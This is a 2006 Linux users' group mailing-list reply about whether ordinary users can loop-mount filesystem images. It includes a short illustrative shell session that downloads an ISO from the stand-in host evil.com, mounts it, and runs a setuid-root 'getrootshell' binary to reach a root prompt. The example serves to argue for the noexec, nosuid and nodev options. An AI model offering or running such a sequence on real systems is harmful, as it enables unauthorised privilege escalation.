[Date Prev] [Date Next] [Thread Prev] [Thread Next] [Date Index] [Thread Index]
In the message dated: 2006年11月16日 17:24:07 EST, The pithy ruminations from Jeff Abrahamson on <[PLUG] loopback mounting fs images> were: => => => Mount in general denies its services to non-privileged users unless => explicit authorization is made in /etc/fstab. => => I'd like to be able to mount filesystem images from an already mounted => filesystem without having to authorize myself specially. I don't By "filesystem images from an already mounted filesystem" do you mean that an image already exists as a file on the machine? => think this is possible, but I'm curious (1) if I'm wrong and it is => possible, and (2) what the security concerns of this would be as long => as mount restricted me to mounting files I own on mount-points I own => and didn't permit files in the newly mounted fs to have permissions or => ownership that I couldn't otherwise give them. I don't understand the last part "as long as mount...didn't permit files in the newly mounted fs to have permissions or ownership that I couldn't otherwise give them". AFAIK, mount(8) doesn't have that kind of control. You can get some of what you want with the "nosuid" option, but I don't believe that mount will change the ownership of files to match the person doing the mounting. Of course, mount has a gazillion options, depending on the specific filesystem type that you are mounting, and how well those filesystem semantics translate to your OS. You may want to consider FUSE (http://fuse.sourceforge.net/) and the Mountlo project. [DISCLAIMER]I haven't actually used FUSE.[/DISCLAIMER] Otherwise, it's all to easy to do: joeuser% cd /tmp joeuser% wget -nd http://evil.com/downloads/crackertools.iso joeuser% mkdir /tmp/mymountpoint joeuser% mount /tmp/crackertools.iso /tmp/mymountpoint -t iso9660 -o loop=/dev/loop3,blocksize=1024 joeuser% ls -l /tmp/mymountpoint -rws--x--x 1 root bin 106924 Jan 9 2004 getrootshell joeuser% /tmp/mymountpoint/getrootshell joeuser# [the exercise of gaining root when you own device files is a bit more tricky, but quite possible]. Seriously, if you're going to permit users to mount file systems, enforce the "noexec" and "nosuid" and "nodev" options. Mark => => Jeff => => Jeff Abrahamson <http://jeff.purple.com/> +1 215/837-2287 => GPG fingerprint: 1A1A BA95 D082 A558 A276 63C6 16BF 8C4C 0D1D AE4B => => --zS7rBR6csb6tI2e1 => Content-Type: application/pgp-signature; name="signature.asc" => Content-Description: Digital signature => Content-Disposition: inline => => -----BEGIN PGP SIGNATURE----- => Version: GnuPG v1.4.5 (GNU/Linux) => => iD8DBQFFXOUHFr+MTA0drksRAgV3AKCMysL0PePFL9XFmUqmwbyvzO2JsgCeMDRN => 5MRCf/Ik/yCTcrBIani8CTM= => =0zq6 => -----END PGP SIGNATURE----- ___________________________________________________________________________ Philadelphia Linux Users Group -- http://www.phillylinux.org Announcements - http://lists.phillylinux.org/mailman/listinfo/plug-announce General Discussion -- http://lists.phillylinux.org/mailman/listinfo/plug